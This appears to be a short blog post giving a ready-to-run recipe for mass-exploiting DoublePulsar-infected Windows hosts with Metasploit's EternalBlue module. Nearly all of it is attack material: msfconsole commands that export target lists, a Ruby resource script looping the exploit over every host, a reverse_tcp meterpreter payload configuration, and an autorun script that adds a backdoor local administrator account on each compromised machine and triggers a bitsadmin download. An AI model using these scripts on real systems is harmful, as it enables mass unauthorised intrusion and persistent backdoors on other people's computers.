remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.

 
   
 ## msfconsole
  
 msf > vulns -R  
 … a lot of text … look at end of output for a file dropped in /tmp e.g. ...  
 RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k  
   
 msf > exit  
   
 # cd ~/.msf4/  
 # cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked  
 # msfconsole -r doublepulsar-loop.rc  
   
 Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser  
 as those hosts have had the local admin user for your evil created.  
   
## files
   
 [doublepulsar-loop.rc]  
   
 <ruby>  
   
 # the rhosts from vuln_db  
 hostsfile="/root/.msf4/thewicked"  
 hosts=[]  
 File.open(hostsfile,"r") do |f|  
 f.each_line do |line|  
 hosts.push line.strip  
 end  
 end  
   
 # msfconsole commands with chained post exploit  
 self.run_single("resource /root/.msf4/doublepulsar.rc")  
   
 # the rhosts loop  
 hosts.each do |rhost|  
 self.run_single("set rhost #{rhost}")  
 self.run_single("exploit")   
 run_single("sleep 2s")  
 end  
   
 </ruby>  
   
 [doublepulsar.rc]  
   
 spool /root/.msf4/logs/doublepulsar.log  
 set consolelogging true  
 set loglevel 5  
 set sessionlogging true  
 set timestampoutput true  
   
 use exploit/windows/smb/ms17_010_eternalblue  
 set VerifyArch False  
 set VerifyTarget False  
 set PAYLOAD windows/x64/meterpreter/reverse_tcp  
 set LHOST   
 set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin  
   
 [doublepulsar-lsadmin]  
 execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"  
 execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"  
 execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
 exit